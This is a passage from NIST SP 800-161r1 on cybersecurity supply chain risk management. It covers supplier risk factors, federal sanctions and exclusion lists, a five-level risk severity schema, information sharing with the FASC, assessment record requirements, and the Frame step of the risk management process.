in baseline if
relevant to source
and/or product
being assessed; if
in doubt, include)
Information about
counterfeits, suspected
counterfeits, gray market,
or non-conforming
products
• Evidence or history of counterfeits or
non-conforming products associated
with the supplier
• Suppliers’ anti-counterfeit practices and
controls
• Sourcing of components from the gray
market
Supply Chain
Relationships,
Visibility, and
Controls
Information about the
supply chain associated
with the source and/or
covered article.
• Evidence of effective C-SCRM and
supplier relationship management
practices
• Components or materials (relevant to
covered article) originate from single
source in upstream supply chain
• Reliance on single trade route
• Provenance of the product
Information about these baseline risk factors should be generally available from open sources,
although the type, quality, and extent of information is likely to vary broadly. In some instances,
no information may be discovered or deemed to be applicable for a given factor and should be
noted accordingly. Research should be tailored toward attaining credible information of greatest
relevance to the purpose and context for which the assessment is being conducted (see discussion
about information quality in the Assessment Documentation and Records Management section
below). Because of these variables, it is not possible nor desirable to attempt to standardize
below the risk factor level.
Findings associated with these factors may reflect a mix of information about objective facts,
threats, vulnerabilities, or general “exposures” that, when assessed discretely or in aggregate,
indicate risk being possible or present. The findings may also be positive, neutral, or negative in
nature. Positive findings are indicative of the source or covered article having desired or required
assurance attributes. Negative findings indicate that there is or may be a risk that presents
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
245
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
concern and for which a determination needs to be made as to whether the risk is within
tolerance, requires mitigation, and/or may compel the need for information sharing with the
FASC.
Caution! The existence of one or more risk indicators associated with the above factors does not
necessarily indicate whether a source, product, or service poses a viable or unacceptable risk, nor
does it indicate the severity of the risk. Care should also be taken to analyze what combination of
factors and findings may give rise to risk or, conversely, mitigate risk concerns. Uncertainty
about a risk determination may prompt the need to conduct additional due diligence research and
analysis, escalate internally or externally, or seek advice as to whether the risk is such that
mitigation is not possible.
Separate from or as part of the assessment, agencies should examine whether there are any laws
or federal restrictions that prohibit the use of certain suppliers and the acquisition or use of
certain items, services, or materials. The list below, while not inclusive of all applicable laws and
restrictions, is focused on foreign ownership and control, other types of foreign influence,
foreign adversaries, and foreign investment concerns that may pose risks to the U.S. supply
chain.
The use of such suppliers or the acquisition of such an item, service, or material from an
individual or entity in any of the lists below is a violation of law absent an exception or waiver
and should, therefore, be excluded from the federal procurement process. If an item has already
been obtained prior to the below prohibitions going into effect, agencies should conduct an
assessment to determine whether they are permitted to keep the prohibited items or services and,
if so, whether any adversarial threats posed by continued use can be mitigated.
1. The Specially Designated Nationals (SDN) and Blocked Persons List: The Treasury
Department, Office of Assets Control (OFAC), through EO 13694 and as amended by EO
13757, provided for the designation on the Specially Designated Nationals and Blocked
Persons List (SDN List) of parties determined to be responsible for, complicit in, or to
have engaged in, directly or indirectly, malicious cyber-enabled activities. Any entity in
which one or more blocked persons directly or indirectly holds a 50 % or greater
ownership interest in the aggregate is itself considered blocked by operation of law. U.S.
persons may not engage in any dealings, directly or indirectly, with blocked persons.
2. The Sectoral Sanctions Identifications (SSI) List: The sectoral sanctions imposed on
specified persons operating in sectors of the Russian economy identified by the Secretary
of the Treasury were done under EO 13662 through Directives issued by OFAC pursuant
to its delegated authorities. The SSI List identifies individuals who operate in the sectors of
the Russian economy with whom U.S. persons are prohibited from transacting with,
providing financing for, or dealing in debt with a maturity of longer 90 days.
3. The Foreign Sanctions Evaders (FSE) List: OFAC publishes a list of foreign individuals
and entities determined to have violated, attempted to violate, conspired to violate, or
caused a violation of U.S. sanctions on Syria or Iran pursuant to EO 13608. It also lists
foreign persons who have facilitated deceptive transactions for or on behalf of persons
subject to U.S. sanctions. Collectively, such individuals and companies are called “Foreign
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
246
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Sanctions Evaders” or “FSEs.” Transactions by U.S. persons or within the United States
involving FSEs are prohibited.
4. The System for Award Management (SAM) Exclusions: The SAM contains the
electronic roster of debarred companies excluded from federal procurement and non‐
procurement programs throughout the U.S. Government (unless otherwise noted) and from
receiving federal contracts or certain subcontracts and from certain types of federal
financial and non-financial assistance and benefits. The SAM system combines data from
the Central Contractor Registration, Federal Register, Online Representations and
Certification Applications, and the Excluded Parties List System. It also reflects data from
the Office of the Inspector General’s exclusion list (GSA) (CFR Title 2, Part 180).
5. The List of Foreign Financial Institutions Subject to Correspondent Account
Payable-Through Account Sanctions (the “CAPTA List”): The CAPTA List replaced
the list of Foreign Financial Institutions Subject to Part 561. It includes the names of
foreign financial institutions subject to sanctions, certain prohibitions, or strict conditions
before a U.S. company may do business with them.
6. The Persons Identified as Blocked: Pursuant to 31 CFR 560 and 31 CFR 560.304,
property and persons included on this list must be blocked if they are in or come within the
possession or control of a U.S. person.
7. The BIS Unverified List: Parties listed on the Unverified List (UVL) are ineligible to
receive items subject to the Export Administration Regulations (EAR) by means of a
license exception.
8. The 2019 National Defense Authorization Act, Section 889: Unless a waiver is granted,
NDAA Section 889 prohibits the Federal Government, government contractors, and grant
and loan recipients from procuring or using certain “covered telecommunication
equipment or services” that are produced by Huawei, ZTE, Hytera, Hikvision, Dahua, and
their subsidiaries as a “substantial or essential component of any system or as critical
technology as part of any system.”
9. Any other federal restriction or law that would restrict the acquisition of goods, services, or
materials from a supplier.
Risk Severity Schema
A common framework is needed as a reference to aid agencies in determining an appropriate risk
response to the results of an SCRA. This schema indicates whether an identified risk associated
with a given source or covered article can be managed within agency-established C-SCRM
processes or requires internal or external escalation for a risk-response decision or action.
There is benefit in adopting and tailoring an existing government-wide severity schema as this
creates a degree of alignment and consistency with other related processes and guidance that are
already in use. The Supply Chain Risk Severity Schema (SCRSS) introduced and described
below mirrors the intent and structure of the Cyber Incident Severity Schema (CISS), which was
developed in coordination with departments and agencies with a cybersecurity or cyber
operations mission.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
247
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Similar to the CISS but focused on and tailored to supply chain risks versus cyber incidents, the
SCRSS is intended to ensure a common view of:
•
The severity of assessed supply chain risk associated with a given source or covered
article,
•
The urgency required for risk response,
•
The seniority level necessary for coordinating or making a risk response decision, and
•
The information, documentation, and processes required to inform and support risk
response efforts.
Table E-2: Risk Severity Schema
Level
Type
Description
5
Urgent National Security
Interest Risk
Adversarial-related risk with imminent or present
impact to national security interests
4
National Security Interest
Risk
Adversarial-related risk with potential to impact
national security interests
3
Significant Risk
Adversarial-related risk with potential to impact
multiple agencies
2
Agency High Risk
Non-adversarial-related “high” risk associated with an
agency’s critical supplier (i.e., source), system,
component, or high value asset
1
Agency Low or Moderate
Risk
Assessed risk that does not meet the description for any
of the other four risk levels
The schema in Table E-2 is not intended to replace existing agency-established methodologies
that describe and assign various risk levels or scores. Rather, it is to be used as a mapping
reference that associates an agency risk assessment result to the schema level that most closely
describes that result. Mapping gives agencies the flexibility they need to assess and describe risk
levels in a manner applicable to their purpose and context while also creating a normalized
lexicon to commonly describe supply risk severity across the federal enterprise. This schema
framework also helps to communicate expectations about risk response coordination,
information sharing, and decision-making responsibilities associated with each level.
Risk Response Guidance
Depending on the SCRSS level of an assessed supply chain risk, agencies may need to escalate
and share SCRA information with others within their internal organization for further research,
analysis, or risk response decisions or engage with external officials, such as the FASC.
Information Sharing
Supply chain risks assessed at Levels 3 and above are characterized as “substantial risk,” per the
FASC rule, and require mandatory information sharing with the FASC via the Information
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
248
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Sharing Agency54 (ISA) for subsequent review and potential additional analysis and action. At
their discretion, agencies may choose to voluntarily share information concerning identified
Level 2 or Level 1 risks with the FASC supply chain, in accordance with FASC information-
sharing processes and requirements.
SCRI that is identified or received outside of an assessment process may also compel the need
for mandatory or voluntary sharing with the FASC or another government organization, such as
the FBI, FCC, or DHS CISA. Examples of such information include but are not limited to
information about a supply chain event, supply chain incident, information obtained from an
investigatory organization (e.g., the Office of Inspector General), or an anonymous tip received
through an agency hotline.
All information sharing that occurs between an agency and the FASC, whether mandatory or
voluntary, is to be done in accordance with FASC-established information sharing requirements
and processes consistent with the authorizing statute and regulations. Additionally, agencies
should designate a senior agency official to be the liaison for sharing information with the FASC.
Agencies should establish processes for sharing (sending and receiving) information between the
agency and the FASC and establish commensurate requirements and processes tailored to their
organization for sharing SCRI within their own organization.
Note: The FASC may issue updated or additional guidance concerning the circumstances and
criteria for mandatory and voluntary information sharing. Agencies should refer to and follow
the most current FASC guidance.
Risk Response Escalation and Triaging
Agencies are reminded of the importance of integrating SCRM into enterprise risk management
activities and governance, as covered extensively in the main body and appendices of NIST SP
800-161, Rev. 1. For risk that is determined to be at a SCRSS substantial level, it is necessary to
escalate the risk assessment information to applicable senior level officials within the agency,
including legal counsel. Agencies should also ensure that appropriate officials have sufficient
security clearances to allow them to access classified information, as needed and appropriate, to
inform or support risk response coordination, decisions, or actions.
Because a risk deemed to be substantial is adversarial in nature, there may also be law
enforcement, counter-intelligence equities, legal implications, or existing activities that need to
be considered prior to responding to the assessed risk or engaging or communicating with the
source. Agencies’ sharing of substantial risk information with the FASC standardizes and
streamlines the process that agencies should follow to ensure these risks are “triaged”
appropriately.
54 The Department of Homeland Security (DHS), acting primarily through the Cybersecurity and Infrastructure Security
Agency, has been designated to serve as the FASC’s ISA. The ISA performs administrative information sharing functions
on behalf of the FASC, as provided at 41 U.S.C. 1323 (a) (3).kk
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
249
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
ASSESSMENT DOCUMENTATION AND RECORDS MANAGEMENT
Content Documentation Guidance
Agencies need to ensure that their assessment record satisfies the minimal documentation
requirements described in this section for the mandatory sharing of information about sources
and/or covered articles to the FASC or when escalating internally for risk-response decisions that
may implicate the use of an agencies’ Section 4713 authority. This documentation baseline
standard helps to ensure that a robust and defensible record is or can be established to support
well-informed risk response decisions and actions. It also helps to promote consistency in the
scope and organization of documented content to facilitate comparability, re-usability, and
information sharing.
The documentation requirements extend beyond capturing risk factor assessment information
and include general facts about who conducted the assessment and when, identifier and
descriptive information about the source and covered article, citation of the data sources used to
attain assessment information, an assignment of a confidence level to discrete findings and
aggregate analysis of findings, and noting assumptions and constraints.
Agencies should also have and follow a defined assessment and risk determination methodology.
This methodology should be documented or referenced in the assessment record concerning a
given source and/or covered article. Any deviations from the agency-defined methodology
should be described in the general information section of the assessment record.
As information is researched and compiled, it needs to be organized and synthesized to cull out
and document relevant findings that align with the varying risk factor categories. Sourced
information (including contextual metadata), especially notable findings of risk of concern,
should retain or be retrievable in a form that retains its informational integrity and considered as
supplemental content that may be required to support and defend a risk response decision or
action. As such, the sources for, the quality of, and the confidence in the sourced information
need to be considered as part of the assessment activity and documented accordingly. Broadly,
quality information should be timely, relevant, unbiased, sufficiently complete or provided in-
context, and attained from credible sources.
Documentation requirements should be incorporated into existing, relevant supply chain risk
assessment policies, processes, and procedures. These requirements should be informed by
consultation with and direction from officials within the agency, to include legal counsel and
personnel with responsibilities for records management, CUI and classified information
management, and privacy.
While a format is not specified, the minimal scope of content and documentation for a given
assessment record should include the content described in Table E-3 below:
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
250
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Table E-3: Assessment Record – Minimal Scope of Content and Documentation
General Information
Additional Comments
Agency responsible for the
assessment
Agencies should be able to identify points of contact and
retain information about any non-federal personnel who
supported the assessment, tools, and/or data sources
(inclusive of commercially obtained) used in support of the
assessment.
Date of assessment or time
frame in which the assessment
was conducted
Agencies should note which of their findings are temporal
in nature and subject to change over time.
Source Profile: Identifier and
Descriptive Information about
Assessed Supplier
Document (as knowable and applicable) the supplier’s
legal name, DBA name, domicile, physical address, and (if
different) the physical location of HQ; DUNS number and
CAGE Code; contact phone number; registered as foreign
or domestic company; company website URL, company
family tree structure, and location in company family tree
(if known); company size; years in business; and market
segment.
Identifier and descriptive
information about assessed
covered article
Document the product name, unique identifier (e.g., model
number, version number, serial number), relevant NAICS
and PSC, and a brief description.
Summary of purpose and context
of assessment
Identify the applicable life cycle phase indicated when the
assessment occurred (e.g., market research, procurement
action, operational use).
Assessment methodology
Reference the documented methodology, and describe any
deviations from it.
Source or covered article
research, findings, and risk
assessment results
Document the analysis of findings, identification, and
assessment of risk. Minimally, there should be a
summation of the key findings, an analysis of those
findings, and a rationale for risk level determination. This
summary should address potential or existing threats
(whether and why they are assessed as adversarial, non-
adversarial, or indeterminate in nature) or vulnerabilities of
the source, covered article, and the associated supply
chain. Include notes about relevant assumptions and
constraints.
Impact assessment
Relative to the purpose and context of the assessment,
describe the assessed potential for impact given the type,
scope, and severity of the identified risk.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
251
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
General Information
Additional Comments
Mitigation of unresolved or
unacceptable risks
Include a discussion of the capability, capacity, and
willingness of the source to mitigate risks to a satisfactory
level and/or the capability and capacity of the agency to
mitigate risks. Identify viable mitigation options, if known,
to address any unresolved or unacceptable risks.
Assessment of risk severity level
in accordance with supply chain
risk severity schema
Include the SCRSS level number and an explanation for
why this level was assigned. Address identified
implications for government missions or assets, national
security, homeland security, or critical functions associated
with use of the source or covered article.
Risk response
Describe risk response decisions or actions taken (e.g.,
avoid, mitigate, escalate to FASC for coordination and
triaging).
Any other information, as
specified and directed to provide
by the FASC or is included per
agency discretion
Describe or provide information that would factor into an
assessment of supply chain risk, including any impact to
agency functions and other information as the FASC
deems appropriate.
Review and clearance
Ensure that the credibility of and confidence in the sources
and available information used for risk assessment
associated with proceeding, using alternatives, and/or
enacting mitigation efforts is addressed. Confirm that the
assessment record was reviewed and cleared by applicable
officials, to include applicable Senior Leadership and legal
counsel, for risk assessed as being substantial. Review and
clearance are also intended to ensure that the assessment
record and supporting information are appropriately
safeguarded, marked, and access-controlled.
Assessment Record
Agencies should ensure that records management requirements are adhered to with regard to
SCRAs and supporting artifacts. Policies and procedures should be in place that address the
requisite safeguarding, marking, handling, retention, and dissemination requirements and
restrictions associated with an assessment record and its associated content.
If and when assessment services (e.g., analytic support) or commercially-provided information
are obtained to support the development of an assessment record, an agreement (e.g., contract,
interagency agreement) should specify appropriate requirements and restrictions about scope, the
purpose of data use, and limitations, access, disposal, and retention rights.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
252
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX F: RESPONSE TO EXECUTIVE ORDER 14028’s CALL TO PUBLISH
GUIDELINES FOR ENHANCING SOFTWARE SUPPLY CHAIN SECURITY
Departments and agencies seeking to implement Cybersecurity Supply Chain Risk Management
in accordance with Executive Order (EO) 14028, Improving the Nation’s Cybersecurity, should
reference NIST’s dedicated EO 14028 web-based portal at https://www.nist.gov/itl/executive-
order-improving-nations-cybersecurity. This guidance has been moved online in order to:
• Co-locate it with related EO guidance under NIST’s purview;
• Enable updates to reflect evolving guidance without directly impacting SP 800-161, Rev.
1; and
• Provide traceability and linkage with other NIST web-based assets as they move online to
encourage dynamic and interactive engagement with stakeholders.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
253
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX G: C-SCRM ACTIVITIES IN THE RISK MANAGEMENT PROCESS55
Risk management is a comprehensive process that requires enterprises to: 1) frame risk (i.e.,
establish the context for risk-based decisions), 2) assess risk, 3) respond to risk once determined,
and 4) monitor risk on an ongoing basis using effective enterprise communications and a
feedback loop for continuous improvement in the risk-related activities of enterprises. Figure G-
1 depicts interrelationships among the risk management process steps, including the order in
which each analysis may be executed and the interactions required to ensure that the analysis is
inclusive of the various inputs at the enterprise, mission, and operations levels.
Fig. G-1: Cybersecurity Supply Chain Risk Management (C-SCRM)
The steps in the risk management process (Frame, Assess, Respond, and Monitor) are iterative
and not inherently sequential in nature. Different individuals may be required to perform the
steps at the same time, depending on a particular need or situation. Enterprises have significant
flexibility in how the risk management steps are performed (e.g., sequence, degree of rigor,
formality, and thoroughness of application) and in how the results of each step are captured and
shared both internally and externally. The outputs from a particular risk management step will
directly impact one or more of the other risk management steps in the risk management process.
Figure G-2 summarizes C-SCRM activities throughout the risk management process as they are
performed within the three risk framework levels. The arrows between different steps of the risk
management process depict the simultaneous flow of information and guidance among the steps.
55 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
254
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Together, the arrows indicate that the inputs, activities, and outputs are continuously interacting
and influencing one another. More details are provided in the forthcoming subsections.
Fig. G-2: C-SCRM Activities in the Risk Management Process
Figure G-2 depicts interrelationships among the risk management process steps, including the
order in which each analysis is executed and the interactions required to ensure that the analysis
is inclusive of the various inputs at the enterprise, mission and business process, and operational
levels.
The remainder of this section provides a detailed description of C-SCRM activities within the
Frame, Assess, Respond, and Monitor steps of the Risk Management Process. The structure of
subsections Frame through Monitor mirrors the structure of [NIST SP 800-39], Sections 3.1-3.4.
For each step of the Risk Management Process (i.e., Frame, Assess, Respond, Monitor), the
structure includes Inputs and Preconditions, Activities, and Outputs and Post-Conditions.
Activities are further organized into Tasks according to [NIST SP 800-39]. [NIST SP 800-161,
Rev 1.] cites the steps and tasks of the risk management process, but rather than repeating any
other content of [NIST SP 800-39], it provides C-SCRM-specific guidance for each step with its
Inputs and Preconditions, Activities with corresponding Tasks, and Outputs and Post-Conditions.
This document adds one task to those provided in [NIST SP 800-39] under the Assess step: Task
2-0, Criticality Analysis.
FRAME
ASSESS
RESPOND
MONITOR
• Adopt Operaonal-specific C-
SCRM controls in accordance
with the Select, Implement,
Assess, and Authorize steps of
NIST SP 809-37, Revision 2
• Make enterprise decisions to
accept, avoid, migate, share,
and/or transfer risk
• Select, tailor, and implement C-
SCRM controls, including
common control baselines
• Document C-SCRM controls in
POA&Ms
• Make mission/business-level
decisions to accept, avoid,
migate, share, or transfer risk
• Select, tailor, & implement
appropriate mission/ business-
level controls, including common
control baselines
• Document C-SCRM controls in
POA&Ms
• Integrate C-SCRM into the
enterprise's Connuous
Monitoring program
• Monitor and evaluate enterprise-
level assumpons, constraints,
risk appete / tolerance,
priories/tradeoffs and idenfied
risks
• Monitor effecveness of
enterprise-level risk response
• Integrate C-SCRM into
Connuous Monitoring processes
and systems
• Monitor and evaluate mission-
level assumpons, constraints,
risk appete / tolerance,
priories/tradeoffs and idenfied
risks
• Monitor effecveness of mission-
level risk response
• Monitor the system and
Operaonal-level C-SCRM
controls in accordance with
the Monitorstep of RMF
outlined in NIST SP 809-37,
Revision 2
• Define C-SCRM assumpons,
constraints, risk appete/
tolerance, and priories/tradeoffs,
• Define C-SCRM Governance and
Operang Model
• Develop C-SCRM Strategy, Policies,
and High-Level Implementaon
Plan
• Integrate C-SCRM into enterprise
risk management
• Define and/or Tailor enterprise
C-SCRM assumpons,
constraints, risk tolerance,
priories/tradeoffs to the
mission/business
• Develop mission/business
specific C-SCRM strategies,
policies, and implementaon
plans
• Integrate C-SCRM into
mission/business processes
• Apply/tailor C-SCRM Framing
from Levels 1 and 2 to individual
systems in accordance with the
RMF outlined in NIST 800-37,
Revision 2
• Integrate C-SCRM throughout the
SDLC
• Refine/enhance enterprise's C-
SCRM Frame
• Assess enterprise cybersecurity
risks in the supply chain based
on Frame assumpons and
analyses completed at Level 2
• Determine supply chain
cybersecurity risk exposure of
the enterprise's operaons,
assets, and individuals
• Refine/enhance cricality
assumpons about the
mission/business-specific
operaons, assets, and
individuals
• Assess mission/business specific
threats, vulnerabilies,
likelihoods, and impacts
• Determine supply chain
cybersecurity risk exposure of
mission /business-specific
operaons, assets, and
individuals
• Assess operaonal cybersecurity
risks in the Supply Chain arising
from components or services
provided through the supply
chain in accordance with the
RMF outlined in NIST 800-37,
Revision 2
Enterprise
Mission/Business Process
Operaonal
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
255
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
TARGET AUDIENCE
The target audience for this appendix is those individuals with specific C-SCRM responsibilities
for performing the supply chain risk management process across and at each level. Examples
include those process/functional staff responsible for defining the frameworks and
methodologies used by the rest of the enterprise (e.g., C-SCRM PMO Processes, Enterprise Risk
Management, Mission and Business Process Risk Managers, etc.). Other personnel or entities are
free to make use of the guidance as appropriate to their situation.
ENTERPRISE-WIDE RISK MANAGEMENT AND THE RMF
Managing cybersecurity risks throughout the supply chain requires a concerted and purposeful
effort by enterprises across enterprise, mission and business process, and operational levels. This
document describes two different but complementary risk management approaches that are
iteratively combined to facilitate effective risk management across the three levels.
The first approach is known as FARM and consists of four steps: Frame, Assess, Respond, and
Monitor. FARM is primarily used at Level 1 and Level 2 to establish the enterprise’s risk context
and inherent exposure to risk. Then, the risk context from Level 1 and Level 2 iteratively informs
the activities performed as part of the second approach described in [NIST SP 800-37, Rev. 2],
The Risk Management Framework (RMF). The RMF predominantly operates at Level 356 – the
operational level – and consists of seven process steps: Prepare, Categorize, Select, Implement,
Assess, Authorize, and Monitor. Within the RMF, inputs from FARM at Level 1 and Level 2 are
synthesized as part of the RMF Prepare step and then iteratively applied, tailored, and updated
through each successive step of the RMF. Ultimately, Level 1 and Level 2 assumptions are
iteratively customized and tailored to fit the specific operational level or procurement action
context. For example, an enterprise may decide on strategic priorities and threats at Level 1
(enterprise level), which inform the criticality determination of mission and business processes at
Level 2, which in turn influence the system categorization, control selection, and control
implementation as part of the RMF at Level 3 (operational level). Information flow between the
levels is bidirectional with aggregated Level 3 RMF outputs serving to update and refine
assumptions made at Level 1 and Level 2 on a periodic basis.
Frame
Inputs and Preconditions
Frame is the step that establishes the context for C-SCRM at all three levels. The scope and
structure of the enterprise supply chain, the overall risk management strategy, specific enterprise
and mission and business process strategies and plans, and individual information systems are
defined in this step. The data and information collected during Frame provides inputs for scoping
and fine-tuning C-SCRM activities in other risk management process steps throughout the three
levels. Frame is also where guidance in the form of frameworks and methodologies is established
as part of the enterprise and mission and business process level risk management strategies.
56 The RMF does have some applications at Level 1 and Level 2, such as the identification of common controls.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
256
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
These frameworks and methodologies provide bounds, standardization, and orientation for
supply chain risk management activities performed within later steps.
[NIST SP 800-39] defines risk framing as “the set of assumptions, constraints, risk tolerances,
and priorities/trade-offs that shape an enterprise’s approach for managing risk.” Enterprise-wide
and C-SCRM risk-framing activities should iteratively inform one another. Assumptions that the
enterprise makes about risk should flow down and inform risk framing within C-SCRM activities
(e.g., enterprise’s strategic priorities). As the enterprise’s assumptions about cybersecurity risks
throughout the supply chain evolve through the execution of C-SCRM activities, these
assumptions should flow up and inform how risk is framed at the enterprise level (e.g., level of
risk exposure to individual suppliers). Inputs into the C-SCRM risk framing process include but
are not limited to:
• Enterprise policies, strategies, and governance
• Applicable laws and regulations
• Agency critical suppliers and contractual services
• Enterprise processes (security, quality, etc.)
• Enterprise threats, vulnerabilities, risks, and risk tolerance
• Enterprise architecture
• Mission-level goals and objectives
• Criticality of missions/processes
• Mission-level security policies
• Functional requirements
• Criticality of supplied system/product components
• Security requirements
C-SCRM risk framing is an iterative process that also uses inputs from the other steps of the risk
management processes (Assess, Respond, and Monitor) as inputs. Figure D-3 depicts the Frame
step with its inputs and outputs along the three enterprise levels. At the enterprise level, activities
will focus on framing conditions (i.e., assumptions, constraints, appetites and tolerances, and
priorities and trade-offs) that are broadly applicable across the enterprise. The goal of framing is
to contextualize cybersecurity risks throughout the supply chain in relation to the enterprise and
its strategic goals and objectives. At Level 2, frame activities focus on tailoring the risk frame to
individual mission and business processes (e.g., assumptions about service provider’s role in
achieving mission or business objectives).
Finally, at Level 3, conditions outlined at Level 1 and Level 2 iteratively inform each step of the
RMF process. Beginning with the Prepare step, conditions outlined at Level 1 and Level 2 are
used to establish the context and priorities for managing cybersecurity risks throughout the
supply chain with respect to individual information systems, supplied system components, and
system service providers. With each subsequent RMF step (Categorize through Monitor), these
assumptions are iteratively updated and tailored to reflect applicable operational-level
considerations. Information flow must be bidirectional between levels as insights discovered
while performing lower-level activities may update what is known about conditions outlined in
higher levels.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
257
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Fig. G-3: C-SCRM in the Frame Step
Figures G-3 through G-6 depict inputs, activities, and outputs of the Frame step distributed along
the three risk management framework levels. The large arrows on the left and right sides of the
activities depict the inputs and outputs to and from other steps of the Risk Management Process.
Inputs into the Frame step include inputs from other steps and from the enterprise risk
management process that are shaping the C-SCRM process. Up-down arrows between the levels
depict the flow of information and guidance from the upper levels to the lower levels and the
flow of information and feedback from the lower levels to the upper levels. Together, the arrows
indicate that the inputs, activities, and outputs are continuously interacting and influencing one
another.
Inputs
Frame
Outputs
Enterprise
Mission/Business Process
Operational
• Governance structures
and processes
• Enterprise policies and
strategies
• Applicable laws and
regulations
• enterprise strategic
goals
and objectives
• Contractual
relationships
• Financial limitations
• Enterprise Risk Frame
Determine enterprise C-
SCRM
• Assumptions (e.g.,
criticality, threats,
vulnerabilities,
impacts, likelihoods)
• Constraints (e.g.,
resource limitations,
supply sources)
• Risk appetite and
tolerance
• Priorities and tradeoffs
• Integrate C-SCRM into
enterprise risk
management
• C-SCRM Requirements
• C-SCRM Strategy
• C-SCRM Policies and
Procedures (e.g.,
guidance for scoping,
assessment
methodology, risk
response, and risk
monitoring)
• C-SCRM High-Level
Implementation Plan
• Output of Level 1 Risk
Framing
• Criticality of
mission/business to
enterprise strategic
goals
and objectives
• Mission/business-
specific
–
Governance
structures and
processes
–
Policies and
strategies
–
Laws and
regulations
–
Strategic goals and
objectives
–
Contractual
relationships
–
Financial
limitations
• Tailor/refine Level 1
assumptions,
constraints, risk
appetite/tolerance,
and priorities and
tradeoffs to the
specific
mission/business
• Integrate C-SCRM into
mission/business
processes
• Mission/business
specific
–
C-SCRM Strategy
–
C-SCRM Policies
and Procedures
• C-SCRM
Implementation Plan
• Output of Level 1 and 2
Risk Framing
• Criticality of systems or
operations to
supported
mission/business
processes
• Tailor/refine Level 1
and 2 assumptions,
constraints, risk
tolerance/appetite,
and priorities/tradeoffs
to the system or
operations
• Integrate C-SCRM into
the SDLC
• Operational C-SCRM
requirements
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
258
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
As the Frame step is used to define conditions, enterprises may find that Frame activities are
performed relatively less often than the latter steps of the FARM process. Enterprises may re-
perform Frame activities at defined intervals (e.g., annually, bi-annually) or based on defined
triggers (e.g., business changes and/or new or updated insights from other levels).
Activities
RISK ASSUMPTIONS
TASK 1-1: Identify assumptions that affect how risk is assessed, responded to, and monitored
within the enterprise.
Supplemental Guidance
As a part of identifying risk assumptions within the broader Risk Management process
(described in [NIST SP 800-39]), agencies should do the following:
• Develop an enterprise-wide C-SCRM policy.
• Identify which mission and business processes and related components are critical to the
enterprise to determine the criticality.
• Define which mission and business processes and information systems compose the
supply chain, including relevant contracted services and commercial products.
• Prioritize the application of risk treatment for these critical elements, considering factors
such as but not limited to national and homeland security concerns, FIPS 199 impact
levels, scope of use, or interconnections/interdependencies to other critical processes and
assets.
• Identify, characterize, and provide representative examples of threat sources,
vulnerabilities, consequences/impacts, and likelihood determinations related to the supply
chain.
• Define C-SCRM mission, business, and operational-level requirements.
• Select appropriate assessment methodologies, depending on enterprise governance,
culture, and diversity of the mission and business processes.
• Establish a method for the results of C-SCRM activities to be integrated into the overall
agency Risk Management Process.
• Periodically review the supply chain to ensure that definitions remain current as
evolutions occur over time.
These C-SCRM assumptions should be aligned as applicable to the broader risk assumptions
defined as part of the enterprise risk management program. A key C-SCRM responsibility (e.g.,
of the C-SCRM PMO) is identifying which of those assumptions apply to the C-SCRM context
at each successive risk management framework level. If and when new risk assumptions (i.e.,
Task 1-1) are identified, these should be provided as updates to any corresponding Enterprise
Risk Assumptions (i.e., Enterprise Risk Management version of Task 1-1) as part of an iterative
process.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
259
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Criticality
Critical processes are those that – if disrupted, corrupted, or disabled – are likely to result in
mission degradation or failure. Mission-critical processes are dependent on their supporting
systems that, in turn, depend on critical components in those systems (e.g., hardware, software,
